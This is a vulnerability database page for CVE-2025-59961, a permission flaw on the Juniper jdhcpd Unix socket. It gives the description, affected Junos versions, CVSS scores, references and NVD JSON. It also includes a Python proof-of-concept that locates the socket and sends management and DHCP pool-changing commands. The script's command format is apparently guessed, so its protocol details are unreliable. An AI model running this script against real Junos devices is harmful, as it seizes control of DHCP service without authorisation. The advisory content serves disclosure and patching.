CVE-2025-59961

Description

An Incorrect Permission Assignment for Critical Resource vulnerability in the Juniper DHCP daemon (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged user to write to the Unix socket used to manage the jdhcpd process, resulting in complete control over the resource. This vulnerability allows any low-privileged user logged into the system to connect to the Unix socket and issue commands to manage the DHCP service, in essence, taking administrative control of the local DHCP server or DHCP relay. This issue affects: Junos OS: * all versions before 21.2R3-S10, * all versions of 22.2, * from 21.4 before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R1-S1, 25.2R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1-s2:*:*:*:*:*:* - VULNERABLE

Junos OS: 所有21.2R3-S10之前的版本

Junos OS: 所有22.2版本

Junos OS: 21.4R3-S12之前的21.4版本

Junos OS: 22.4R3-S8之前的22.4版本

Junos OS: 23.2R2-S5之前的23.2版本

Junos OS: 23.4R2-S6之前的23.4版本

Junos OS: 24.2R2-S2之前的24.2版本

Junos OS: 24.4R2之前的24.4版本

Junos OS: 25.2R1-S1和25.2R2之前的25.2版本

Junos OS Evolved: 22.4R3-S8-EVO之前的所有版本

Junos OS Evolved: 23.2R2-S5-EVO之前的23.2版本

Junos OS Evolved: 23.4R2-S6-EVO之前的23.4版本

Junos OS Evolved: 24.2R2-S2-EVO之前的24.2版本

Junos OS Evolved: 24.4R2-EVO之前的24.4版本

Junos OS Evolved: 25.2R1-S1-EVO和25.2R2-EVO之前的25.2版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-59961 PoC - Juniper jdhcpd Unix Socket Exploitation
Note: This PoC is for educational and authorized testing purposes only.
"""
import socket
import os
import struct

def find_jdhcpd_socket():
    """Find the jdhcpd Unix socket path"""
    common_paths = [
        '/var/run/jdhcpd.sock',
        '/var/run/dhcpd.sock',
        '/var/run/junos/jdhcpd.sock',
        '/tmp/jdhcpd.sock'
    ]
    for path in common_paths:
        if os.path.exists(path):
            return path
    return None

def exploit_jdhcpd(socket_path):
    """
    Exploit the incorrect permission on jdhcpd Unix socket
    to execute management commands
    """
    try:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.connect(socket_path)
        
        # Example: Send DHCP management command
        # Command format varies based on jdhcpd implementation
        cmd_type = 0x01  # Management command type
        cmd_data = b'get_status\x00'
        
        # Construct command packet
        header = struct.pack('!BI', cmd_type, len(cmd_data))
        packet = header + cmd_data
        
        sock.send(packet)
        response = sock.recv(4096)
        print(f"[+] Received response: {response}")
        
        # Example: Send configuration modification command
        cmd_type = 0x02  # Configuration command type
        config_cmd = b'set_pool 192.168.1.0/24\x00'
        header = struct.pack('!BI', cmd_type, len(config_cmd))
        packet = header + config_cmd
        
        sock.send(packet)
        response = sock.recv(4096)
        print(f"[+] Configuration command sent successfully")
        
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    print("CVE-2025-59961 - Juniper jdhcpd Socket Exploitation PoC")
    print("=" * 50)
    
    socket_path = find_jdhcpd_socket()
    if socket_path:
        print(f"[+] Found jdhcpd socket at: {socket_path}")
        print("[+] Checking socket permissions...")
        stat_info = os.stat(socket_path)
        print(f"[+] Socket permissions: {oct(stat_info.st_mode)}")
        
        if os.access(socket_path, os.W_OK):
            print("[!] Socket is writable by current user - VULNERABLE!")
            exploit_jdhcpd(socket_path)
        else:
            print("[-] Socket not writable - may need privilege escalation first")
    else:
        print("[-] jdhcpd socket not found")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59961
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59961
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59961/
[4] VulDB https://vuldb.com/cve/CVE-2025-59961
[5] https://kb.juniper.net/JSA103150
[6] https://supportportal.juniper.net/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59961", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:03.400", "lastModified": "2026-01-23T19:39:19.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Permission Assignment for Critical Resource vulnerability in the Juniper DHCP daemon (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged user to write to the Unix socket used to manage the jdhcpd process, resulting in complete control over the resource.\n\nThis vulnerability allows any low-privileged user logged into the system to connect to the Unix socket and issue commands to manage the DHCP service, in essence, taking administrative control of the local DHCP server or DHCP relay.\n\nThis issue affects:\n Junos OS: \n * all versions before 21.2R3-S10,\n * all versions of 22.2,\n * from 21.4 before 21.4R3-S12,\n * from 22.4 before 22.4R3-S8,\n * from 23.2 before 23.2R2-S5, \n * from 23.4 before 23.4R2-S6, \n * from 24.2 before 24.2R2-S2, \n * from 24.4 before 24.4R2, \n * from 25.2 before 25.2R1-S1, 25.2R2; \n\n\n\nJunos OS Evolved: \n * all versions before 22.4R3-S8-EVO, \n * from 23.2 before 23.2R2-S5-EVO, \n * from 23.4 before 23.4R2-S6-EVO, \n * from 24.2 before 24.2R2-S2-EVO, \n * from 24.4 before 24.4R2-EVO, \n * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO."}, {"lang": "es", "value": "Una vulnerabilidad de Asignación Incorrecta de Permisos para Recursos Críticos en el demonio DHCP de Juniper (jdhcpd) de Juniper Networks Junos OS y Junos OS Evolved permite a un usuario local con pocos privilegios escribir en el socket Unix utilizado para gestionar el proceso jdhcpd, lo que resulta en un control completo sobre el recurso.\n\nEsta vulnerabilidad permite a cualquier usuario con pocos privilegios que haya iniciado sesión en el sistema conectarse al socket Unix y emitir comandos para gestionar el servicio DHCP, en esencia, tomando el control administrativo del servidor DHCP local o del relé DHCP.\n\nEste problema afecta a:\n Junos OS:\n * todas las versiones anteriores a 21.2R3-S10,\n * todas las versiones de 22.2,\n * desde 21.4 antes de 21.4R3-S12,\n * desde 22.4 antes de 22.4R3-S8,\n * desde 23.2 antes de 23.2R2-S5,\n * desde 23.4 antes de 23.4R2-S6,\n * desde 24.2 antes de 24.2R2-S2,\n * desde 24.4 antes de 24.4R2,\n * desde 25.2 antes de 25.2R1-S1, 25.2R2;\n\nJunos OS Evolved:\n * todas las versiones anteriores a 22.4R3-S8-EVO,\n * desde 23.2 antes de 23.2R2-S5-EVO,\n * desde 23.4 antes de 23.4R2-S6-EVO,\n * desde 24.2 antes de 24.2R2-S2-EVO,\n * desde 24.4 antes de 24.4R2-EVO,\n * desde 25.2 antes de 25.2R1-S1-EVO, 25.2R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Green", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos ... (truncated)